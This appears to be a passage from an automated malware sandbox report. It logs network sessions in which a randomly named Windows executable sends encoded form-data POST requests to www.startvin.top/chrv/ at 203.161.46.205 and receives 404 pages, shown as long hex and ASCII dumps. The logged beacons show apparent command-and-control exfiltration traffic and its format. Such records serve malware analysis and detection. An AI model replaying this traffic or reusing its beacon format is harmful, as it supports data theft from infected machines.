42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                  Nov 18, 2024 13:14:33.633471966 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                  Nov 18, 2024 13:14:33.633524895 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                  Nov 18, 2024 13:14:33.633620024 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                  Nov 18, 2024 13:14:33.633661985 CET848INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                  Nov 18, 2024 13:14:33.633774042 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                                  Nov 18, 2024 13:14:33.633810043 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                                  Nov 18, 2024 13:14:33.633913994 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                                  Nov 18, 2024 13:14:33.633948088 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                  Nov 18, 2024 13:14:33.633981943 CET212INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linej
                                                                  Nov 18, 2024 13:14:33.638559103 CET1236INData Raw: 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 65 6c 6c 69 70 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 34 2e 36 37 31 35 37 31 37 22 0a 20 20 20
                                                                  Data Ascii: oin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;f


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.753174203.161.46.205803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:35.493324995 CET824OUTPOST /chrv/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.startvin.top
                                                                  Origin: http://www.startvin.top
                                                                  Referer: http://www.startvin.top/chrv/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 6c 6f 67 50 4d 59 65 44 56 5a 71 6f 52 57 45 63 38 50 35 75 4a 6a 79 5a 63 2b 33 43 56 6e 37 79 76 57 76 30 65 48 6e 68 69 36 77 73 63 43 63 53 63 6d 52 62 38 7a 61 76 70 52 34 70 4c 4c 58 57 56 67 79 71 53 44 39 56 32 71 6a 38 64 33 49 4b 52 43 78 74 6d 77 2b 45 71 63 45 34 35 43 73 2f 56 76 4f 54 2b 45 66 4e 32 61 69 55 5a 71 4f 48 38 6b 77 33 50 47 4e 64 55 67 6f 44 75 67 72 67 31 64 77 67 53 72 37 59 76 59 59 4c 6e 6f 46 79 37 4d 56 73 69 65 59 76 4e 6a 42 45 4a 57 34 55 59 49 56 34 69 69 68 66 56 47 46 6c 49 75 71 59 79 32 73 30 6c 37 61 41 32 44 31 46 47 45 6c 73 43 77 53 5a 73 69 64 69 64 32 33 74 4e 38 74 32 69 6e 4d 75 44 32 6d 55 76 69 6a 67 2f 63 68 72 4c 4a 71 67 73 38 38 3d
                                                                  Data Ascii: 0PIXBf9=logPMYeDVZqoRWEc8P5uJjyZc+3CVn7yvWv0eHnhi6wscCcScmRb8zavpR4pLLXWVgyqSD9V2qj8d3IKRCxtmw+EqcE45Cs/VvOT+EfN2aiUZqOH8kw3PGNdUgoDugrg1dwgSr7YvYYLnoFy7MVsieYvNjBEJW4UYIV4iihfVGFlIuqYy2s0l7aA2D1FGElsCwSZsidid23tN8t2inMuD2mUvijg/chrLJqgs88=
                                                                  Nov 18, 2024 13:14:36.188283920 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 18 Nov 2024 12:14:36 GMT
                                                                  Server: Apache
                                                                  Content-Length: 16052
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                  Nov 18, 2024 13:14:36.188317060 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                  Nov 18, 2024 13:14:36.188334942 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                  Nov 18, 2024 13:14:36.188422918 CET636INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                  Nov 18, 2024 13:14:36.188502073 CET1236INData Raw: 38 2e 36 36 33 34 39 20 34 2e 34 31 36 36 34 32 2c 31 38 2e 34 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65
                                                                  Data Ascii: 8.66349 4.416642,18.41676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4
                                                                  Nov 18, 2024 13:14:36.188515902 CET212INData Raw: 30 32 2c 33 31 2e 32 34 36 31 39 20 2d 32 2e 31 38 33 37 36 2c 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37
                                                                  Data Ascii: 02,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-lineca
                                                                  Nov 18, 2024 13:14:36.188532114 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                                  Nov 18, 2024 13:14:36.188548088 CET212INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.7893
                                                                  Nov 18, 2024 13:14:36.188635111 CET1236INData Raw: 34 20 2d 31 2e 32 33 37 33 31 2c 33 34 2e 31 31 35 33 36 20 2d 32 2e 31 38 30 31 34 2c 35 33 2e 36 32 30 31 35 20 2d 30 2e 39 34 32 38 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31
                                                                  Data Ascii: 4 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
                                                                  Nov 18, 2024 13:14:36.188648939 CET212INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 34 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e
                                                                  Data Ascii: th id="path4549" d="m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.29839
                                                                  Nov 18, 2024 13:14:36.193459034 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.753175203.161.46.205803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:38.064846992 CET1837OUTPOST /chrv/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.startvin.top
                                                                  Origin: http://www.startvin.top
                                                                  Referer: http://www.startvin.top/chrv/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 6c 6f 67 50 4d 59 65 44 56 5a 71 6f 52 57 45 63 38 50 35 75 4a 6a 79 5a 63 2b 33 43 56 6e 37 79 76 57 76 30 65 48 6e 68 69 36 6f 73 66 31 30 53 63 46 35 62 39 7a 61 76 71 52 34 71 4c 4c 58 58 56 67 71 51 53 44 78 76 32 6f 62 38 63 52 45 4b 54 7a 78 74 2f 41 2b 45 6f 63 45 39 32 69 73 71 56 76 65 70 2b 45 76 4e 32 61 69 55 5a 70 57 48 37 78 45 33 4e 47 4e 53 56 67 6f 66 71 67 71 33 31 5a 63 77 53 71 4f 6a 73 6f 34 4c 6b 49 56 79 38 70 35 73 39 75 59 74 42 44 42 4d 4a 57 31 57 59 49 4a 43 69 69 46 78 56 42 4a 6c 5a 34 44 67 68 47 38 41 77 6f 66 56 2f 7a 68 6f 46 32 74 6e 62 7a 47 53 68 6c 35 43 42 52 2f 53 4f 71 46 74 73 67 6c 77 65 57 6d 37 33 44 7a 46 78 59 59 31 66 34 4b 6c 34 71 2f 4e 5a 57 62 58 42 58 6d 71 48 55 57 7a 75 47 34 4a 6f 6b 62 75 74 30 36 44 64 41 6c 46 4b 47 6d 51 34 30 34 55 75 75 35 56 2f 48 35 75 51 45 32 34 30 76 32 74 2f 78 66 58 46 69 47 51 50 51 76 75 68 36 33 38 79 70 63 55 78 6e 62 72 44 4d 66 37 5a 63 67 33 63 54 50 73 45 4d 67 4a 48 4e 43 68 4e 74 [TRUNCATED]
                                                                  Data Ascii: 0PIXBf9=logPMYeDVZqoRWEc8P5uJjyZc+3CVn7yvWv0eHnhi6osf10ScF5b9zavqR4qLLXXVgqQSDxv2ob8cREKTzxt/A+EocE92isqVvep+EvN2aiUZpWH7xE3NGNSVgofqgq31ZcwSqOjso4LkIVy8p5s9uYtBDBMJW1WYIJCiiFxVBJlZ4DghG8AwofV/zhoF2tnbzGShl5CBR/SOqFtsglweWm73DzFxYY1f4Kl4q/NZWbXBXmqHUWzuG4Jokbut06DdAlFKGmQ404Uuu5V/H5uQE240v2t/xfXFiGQPQvuh638ypcUxnbrDMf7Zcg3cTPsEMgJHNChNtXtDfujUBBaLD1+1T6wV81DlbROJNgS8zdivhXWlZxY1BnvqvqDZhlRz1Pi8jR+tltFvmK/3beOd+vbYcZMlE8JmZ5N+/QrB7AE33xAdWEcKjBJo0WLjgGcXb3j0JJsqqMqWj9loH/VcK5qswpkZvmjIg794+9azv3n/0kgoJTGC1LJhX8fHWn1VoUFrGG8WBXRgeEhwKXYt3+orq0isX5bD5jUOswT8/7LZHgI4asvUgmyFkmrbeGt8XxnO2PDLPJm80eqajUXP7oGuyllfleHvk9CjkWZ66VTh4AYqkMKBtWJ1bQvvlmy+GzHMRUyTNunDIzp/sopSeIcRqeeF5oYlPC2oT5xv3fHpVcPN/BBwO8oyQuLkfPqA2JRkynYx6et758PYG4Mqw/BqOAdlsg8dUYZPgqp7NZ47KEs+J8h+jZT8FbuVC/tuzXY6NAhbgULRDAyoyV3aCc6s8h/bQ6VLKlF2W5EEHQ5jkBiD9mHDUACzxkqn8HW4cEXCOOJZ8efk3x34nuPAyRAJP7Wjqxa7pI9asloPPdXRYrHfbBg5cdK5DuYtRwzGRuDjCoB05mIb/qggjWuA1yRXiXDUetdME4vJ4CtT4sea3MwDB7O0BhPx4gukDyk5kPUPHMr+uPDVURW3rMF9nqBwVLnl30bJd/KtIaweZFo [TRUNCATED]
                                                                  Nov 18, 2024 13:14:38.756336927 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 18 Nov 2024 12:14:38 GMT
                                                                  Server: Apache
                                                                  Content-Length: 16052
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                  Nov 18, 2024 13:14:38.756401062 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                  Nov 18, 2024 13:14:38.756418943 CET424INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                  Nov 18, 2024 13:14:38.756437063 CET1236INData Raw: 35 39 31 2c 31 2e 31 37 38 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33
                                                                  Data Ascii: 591,1.17801 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396
                                                                  Nov 18, 2024 13:14:38.756499052 CET1236INData Raw: 20 2d 35 2e 35 38 33 38 32 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33
